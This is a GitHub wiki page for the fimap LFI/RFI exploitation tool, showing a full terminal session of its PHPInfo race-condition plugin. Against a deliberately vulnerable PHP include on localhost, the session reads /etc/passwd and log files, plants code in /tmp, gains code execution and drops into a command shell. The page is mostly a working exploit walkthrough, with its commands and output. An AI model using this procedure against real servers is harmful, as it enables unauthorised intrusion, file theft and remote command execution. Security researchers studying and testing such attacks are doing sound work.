-
Notifications
You must be signed in to change notification settings - Fork 99
FimapPhpInfoExploit
Oweoqi edited this page Mar 27, 2015
·
1 revision
This plugin wouldn't be possible without the hard research of
Gynvael Coldwind (http://gynvael.coldwind.pl)
and
Insomnia Security (http://insomniasec.com) since its based on this paper: http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf
<? include($_POST["super"]); ?>
imax /st0rage/dev/fimap/src $ ./fimap.py -u http://localhost/test.php -P super=sexy
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
SingleScan is testing URL: 'http://localhost/test.php'
[04:01:06] [OUT] Inspecting URL 'http://localhost/test.php'...
[04:01:06] [INFO] Fiddling around with URL...
[04:01:06] [OUT] [PHP] Possible file inclusion found! -> 'http://localhost/test.php' with POST-Parameter 'super'.
[04:01:06] [OUT] [PHP] Identifying Vulnerability 'http://localhost/test.php' with POST-Parameter 'super'...
[04:01:06] [INFO] Scriptpath received: '/var/www'
[04:01:06] [INFO] Operating System is 'Unix-Like'.
[04:01:06] [INFO] Testing file '/etc/passwd'...
[04:01:07] [INFO] Testing file '/proc/self/environ'...
[04:01:07] [INFO] Testing file 'php://input'...
[04:01:07] [INFO] Testing file '/var/log/apache2/access.log'...
[04:01:07] [INFO] Testing file '/var/log/apache/access.log'...
[04:01:07] [INFO] Testing file '/var/log/httpd/access.log'...
[04:01:07] [INFO] Testing file '/var/log/apache2/access_log'...
[04:01:07] [INFO] Testing file '/var/log/apache/access_log'...
[04:01:07] [INFO] Testing file '/var/log/httpd/access_log'...
[04:01:07] [INFO] Testing file '/var/log/auth.log'...
[04:01:07] [INFO] Testing file '/var/log/secure'...
[04:01:07] [INFO] Testing file 'http://www.phpbb.de/index.php'...
##########################################################
#[1] Possible PHP-File Inclusion #
##########################################################
#::REQUEST #
# [URL] http://localhost/test.php #
# [POST] super=sexy #
# [HEAD SENT] #
#::VULN INFO #
# [POSTPARM] super #
# [PATH] /var/www #
# [OS] Unix #
# [TYPE] Absolute Clean #
# [TRUNCATION] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
##########################################################
imax /st0rage/dev/fimap/src $ ./fimap.py -x
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
No exploitable domains found.
There are some domains hidden tho because they cant be exploited by fimap without help.
To show them start fimap with *uppercase* -X
imax /st0rage/dev/fimap/src $ ./fimap.py -X
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
###########################
#:: List of Domains :: #
###########################
#[1] localhost #
#[q] Quit #
###########################
Choose Domain: 1
[04:13:13] [OUT] You have selected a file which is only readable.
[04:13:13] [OUT] Lets see if one of our plugins is interested in it...
######################################################
#Fallback Plugin Selection #
######################################################
#[1] [PHPInfo] Launch Coldwind/Insomnia Glitch... #
#[q] Quit #
######################################################
Your Selection: 1
-----------------------------------------------------------------------------
This plugin wouldnt be possible without the hard research of
Gynvael Coldwind (http://gynvael.coldwind.pl)
and
Insomnia Security (http://insomniasec.com)
since its based on this paper:
http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf
-----------------------------------------------------------------------------
#########################################################
#PHPInfo Coldwind/Insomnia Glitch #
#########################################################
#1. Enter URL of PHPInfo() #
#2. AutoProbe for PHPInfo() #
# Current URL: <None - Define one!> #
#3. Change number of attempts (Current: 5000) #
#4. Change number of threads (Current: 10) #
#5. Change eggdrop location (Current: /tmp/eggdrop) #
#6. Change number of trash to append (Current: 3000) #
#7. Launch attack #
#q. Back to fimap #
#########################################################
Choose action: 1
Please type in the complete URL of the PHPInfo() file: http://localhost/info.php
PHPInfo() URL changed to: http://localhost/info.php
#########################################################
#PHPInfo Coldwind/Insomnia Glitch #
#########################################################
#1. Enter URL of PHPInfo() #
#2. AutoProbe for PHPInfo() #
# Current URL: http://localhost/info.php #
#3. Change number of attempts (Current: 5000) #
#4. Change number of threads (Current: 10) #
#5. Change eggdrop location (Current: /tmp/eggdrop) #
#6. Change number of trash to append (Current: 3000) #
#7. Launch attack #
#q. Back to fimap #
#########################################################
Choose action: 7
Checking if the URL you provided is really a PHPInfo file...
Launching attack...
Egg dropped successfully!
Waiting for remaining threads to finish...
Finished.
PHP Code Injection thru EggDrop works!
[04:13:36] [INFO] Testing execution thru 'popen[b64]'...
[04:13:36] [OUT] Execution thru 'popen[b64]' works!
--------------------------------------------------------------------
Welcome to the fimap_eggshell!
This is a lite version of the fimap shell.
Consider this shell as a temporary shell you should get rid of asap.
Upload your own shell to be on the safe side.
--------------------------------------------------------------------
fimap_eggshell> uname -a
Linux DevelB0x 3.0.0-15-generic #25-Ubuntu SMP Mon Jan 2 17:44:42 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
fimap_eggshell> cat test.php
<? include($_POST["super"]); ?>
fimap_eggshell> q
######################################################
#Fallback Plugin Selection #
######################################################
#[1] [PHPInfo] Launch Coldwind/Insomnia Glitch... #
#[q] Quit #
######################################################
Your Selection: q
imax /st0rage/dev/fimap/src $